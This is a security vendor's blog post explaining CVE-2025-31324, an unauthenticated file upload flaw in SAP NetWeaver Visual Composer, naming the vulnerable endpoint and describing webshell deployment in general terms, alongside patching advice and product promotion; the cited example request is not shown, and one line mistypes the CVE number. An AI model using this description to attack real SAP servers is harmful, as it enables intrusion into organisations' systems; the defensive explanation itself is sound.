CVE-2025-31324: SAP NetWeaver Remote Code Execution Vulnerability Explained

On April 24th, 2025, SAP disclosed a critical vulnerability affecting SAP NetWeaver Visual Composer. CVE-2025-31324 is an unauthenticated file upload vulnerability with a CVSS score of 10.0 (Critical) that allows adversaries to upload executable files and execute commands remotely. SAP NetWeaver is used by a wide range of organizations across different industries, especially large corporations and government agencies. Given the severity of the vulnerability, organizations are advised to patch their vulnerable assets without delay.

In this blog, we explained how the SAP NetWeaver CVE-2025-31324 vulnerability works and how organizations can defend against CVE-2025-31324 attacks.

Simulate Vulnerability Exploitation Attacks with 14-Day Free Trial of Picus Platform

SAP NetWeaver CVE-2025-31324 Vulnerability Explained

SAP NetWeaver acts as the technical backbone for many SAP applications, including ERP (Enterprise Resource Planning), CRM (Customer Relationship Management), and other business solutions. NetWeaver provides the tools and environment needed for building, deploying, and running applications that are critical to business operations. It supports a range of functions, such as application development, data management, system integration, and process orchestration.

On April 24th, 2025, SAP disclosed a critical vulnerability identified in their NetWeaver Visual Composer. CVE-2025-31324 allows adversaries to upload malicious executables without authentication, which can be leveraged for remote code execution. The vulnerability stems from an endpoint designed to simplify the uploading of metadata files. Due to CVE-2020-31324, the endpoint allows unrestricted file uploads, leading to deploying webshells directly into sensitive directories on the vulnerable server​. 

SAP released an emergency security update to address the CVE-2025-31324 vulnerability. Organizations are advised to patch their vulnerable SAP NetWeaver servers. Patching fixes the vulnerability, but if attackers exploited it before the patch, backdoors like webshells or command-and-control beacons might still be present​. Thus, security teams should also conduct proactive threat hunting across the SAP environment, especially looking for post-exploitation activities. 

How SAP NetWeaver CVE-2025-31324 Exploit Works?

CVE-2025-31324 vulnerability is caused by a flaw in the /developmentserver/metadatauploader endpoint. This endpoint does not properly validate or restrict the types of files that could be uploaded. Adversaries can craft a malicious HTTP POST request targeting the vulnerable endpoint and upload JSP webshells into specific server paths. The uploaded webshell acts as a backdoor and allows attackers to run arbitrary operating system commands remotely​. 

The example HTTP POST request is observed to be used by threat actors to deploy JSP webshells using the CVE-2025-31324 vulnerability.

SAP NetWeaver CVE-2025-31324 Vulnerability Exploit Example Seen in the Wild

How Picus Helps Simulate SAP NetWeaver CVE-2025-31324 Attacks?

We also strongly suggest simulating the SAP NetWeaver CVE-2025-31324 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as regreSSHion, Citrix Bleed, and Follina, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for SAP NetWeaver CVE-2025-31324 vulnerability exploitation attacks:

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial  of the Picus Security Validation Platform.